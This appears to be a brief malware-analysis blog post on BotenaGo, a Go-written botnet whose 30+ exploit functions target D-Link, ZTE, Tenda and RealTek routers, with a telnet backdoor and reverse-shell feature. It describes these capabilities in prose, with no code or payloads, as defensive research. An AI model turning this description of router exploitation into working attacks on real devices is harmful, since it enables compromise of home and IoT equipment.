Malware Analysis Space: ‘BotenaGo’ Malware Targets Multiple Routers with 30+ Exploit Functions and Go Reversing Analysis

Summary

Back to November 11, 2021, AT&T Alien Labs had found new malware written in the open-source programming language Golang. Deployed with more than 30 exploits, it had the potential of targeting millions of routers and IoT devices. After that, LevelBlue Labs first published research on their discovery of new malware written in the open-source programming language Golang to GitHub.

But this blog does not go to open-source analysis and still does Go reversing.

Recently, you know lots of malware turned to Go field, which is the new challenge.

Malware itself Key.

1. 30+ different exploit functions and different router versions

2. Support backdoor with telnet and reverse shell httpd

3. Not found DDos attack module inside

4. Plain text string in malware

Analysis

As you know, BotenaGo malware is the type of botnet, but when we face a new malware, we have to analyze what happened in the malware itself.

Obviously, lots of infection functions to vendors like Dlink, ZTE, Tenda, RealTek, and so on; there are some different versions, such as DlinkTwo, DlinkThree, DlinkFour, DlinkFive, DlinkSix, DlinkSeven, and DlinkEight. It told us the attacker was very familiar with different router vendors and deeply researched different versions.

Figure1- infection function to vendors

Those 30+ different exploit functions are relative to the GET and POST methods, which are the attacking paths. the CVE vulnerability that comes from those strings.